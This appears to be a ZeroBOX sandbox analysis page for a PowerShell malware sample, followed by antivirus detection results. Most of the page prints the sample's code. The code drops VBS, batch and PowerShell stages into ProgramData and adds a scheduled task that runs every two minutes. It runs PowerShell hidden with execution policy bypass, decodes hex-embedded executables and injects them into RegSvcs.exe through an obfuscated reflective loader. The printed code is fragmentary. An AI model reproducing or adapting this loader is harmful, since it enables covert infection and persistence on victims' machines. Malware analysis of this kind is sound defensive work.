popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
$rcdz = "C:\ProgramData\dqjg"
New-Item $rcdz -ItemType Directory -Force
$Content = @'
on error resume next
WScript.Sleep 10000
set umin = CreateObject("WScript.Shell")
umin.run "C:\ProgramData\dqjg\1.bat",0
[IO.File]::WriteAllText("C:\ProgramData\dqjg\dqjg.vbs", $Content)
$Content = @'
function sfak {
param($ouls)$ouls = $ouls -split '(..)' | ? { $_ }
ForEach ($oumd in $ouls)
[Convert]::ToInt32($oumd,16)
$wfkg = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300766A7A640000000000000000E00002010B01080000FC0000000A0000000000002E1A0100002000000020010000004000002000000002000004000000000000000400000000000000006001000002000000000000020060850000100000100000000010000010000000000000100000000000000000000000D81901005300000000200100FF07000000000000000000000000000000000000004001000C00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000034FA00000020000000FC000000020000000000000000000000000000200000602E72737263000000FF070000002001000008000000FE0000000000000000000000000000400000402E72656C6F6300000C0000000040010000020000000601000000000000000000000000004000004200000000000000000000000
$gtzy = '4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000504500004C010300985B9FE90000000000000000E00022200B0130000024000000060000000000003E43000000200000006000000000001000200000000200000400000000000000060000000000000000A000000002000000000000030060850000100000100000000010000010000000000000100000000000000000000000EC4200004F000000006000005803000000000000000000000000000000000000008000000C00000060420000380000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002E7465787400000044230000002000000024000000020000000000000000000000000000200000602E7273726300000058030000006000000004000000260000000000000000000000000000400000402E72656C6F6300000C0000000080000000020000002A0000000000000000000000000000400000420000000000000000000000
}catch{}
}catch{}
[Byte[]] $sfak = sfak $oumd
[Byte[]] $lmpi = sfak $gtzy
[Byte[]] $ujts = sfak $wfkg
$ntjx = [Ref].Assembly
$cyeq = $ntjx::'Load'(($lmpi))
}catch{}
$otaj = 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcxcjbgmhtks.exe'
$cyeq.'GetType'('NewxcjbgmhtkPE.PE'.replace('xcjbgmhtk','')).GetMethod('Exxcjbgmhtkecuxcjbgmhtkte'.replace('xcjbgmhtk','')).'Invoke'($null,($otaj.replace('xcjbgmhtk',''),$ujts))
$null,[object[]] ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null ,$null, $otaj
}catch{}
[IO.File]::WriteAllText("C:\ProgramData\dqjg\vuso.ps1", $Content)
Sleep 1
$Content = @'
CMD /C powershell -NOP -WIND HIDDEN -eXEC BYPASS -NONI "C:\ProgramData\dqjg\vuso.ps1"
[IO.File]::WriteAllText("C:\ProgramData\dqjg\1.bat", $Content)
$Content = @'
&'schtasks.exe' '/create' '/sc' 'minute' '/mo' 2 '/tn' ''dqjg '/tr' (('C:\ProgramData\dqjg\dqjg.vbs'));
} catch { }
[IO.File]::WriteAllText("C:\ProgramData\dqjg\dqjg.ps1", $Content)
Start-Sleep 11
$ocam = 'ReadAllText'.Replace('!','');
IEX([IO.File]::$ocam('C:\ProgramData\dqjg\dqjg.ps1'))
Antivirus Signature
Bkav Clean
Lionic Clean
MicroWorld-eScan Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
McAfee Clean
Malwarebytes Clean
VIPRE Clean
Sangfor Malware.Generic-HTML.Save.61eb41a5
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/Runner.BG
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Drp]
Cynet Clean
Kaspersky HEUR:Trojan.PowerShell.Kryptik.gen
BitDefender Clean
ViRobot Clean
Rising Trojan.Runner/PS!8.14176 (TOPIS:E0:zyVglk3iKlG)
Sophos Clean
F-Secure Clean
DrWeb Clean
Zillya Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Trojan.GenericKD.68116438 (B)
GData Script.Trojan.Agent.Z3IBSD
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Gridinsoft Clean
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.PowerShell.Kryptik.gen
Microsoft Trojan:Win32/Casdet!rfn
Google Clean
AhnLab-V3 Clean
Acronis Clean
BitDefenderTheta Clean
TACHYON Clean
VBA32 Clean
Tencent Win32.Trojan.Kryptik.Umhl
Ikarus Clean
MaxSecure Clean
Fortinet Clean
AVG Script:SNH-gen [Drp]
Panda Clean
No IRMA results available.